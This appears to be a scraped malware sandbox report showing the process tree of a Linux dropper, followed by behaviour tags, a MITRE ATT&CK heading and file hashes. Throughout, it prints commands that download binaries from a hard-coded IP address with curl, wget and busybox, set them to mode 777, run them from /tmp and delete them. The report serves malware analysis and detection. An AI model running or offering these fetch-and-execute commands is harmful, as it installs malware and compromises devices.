/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:938
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:941
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:942
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:944
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:947
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:948
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:950
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:953
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:954
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:956
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:959
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:960
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:962
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:965
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:966
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:968
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:971
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:972
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:974
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:977
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97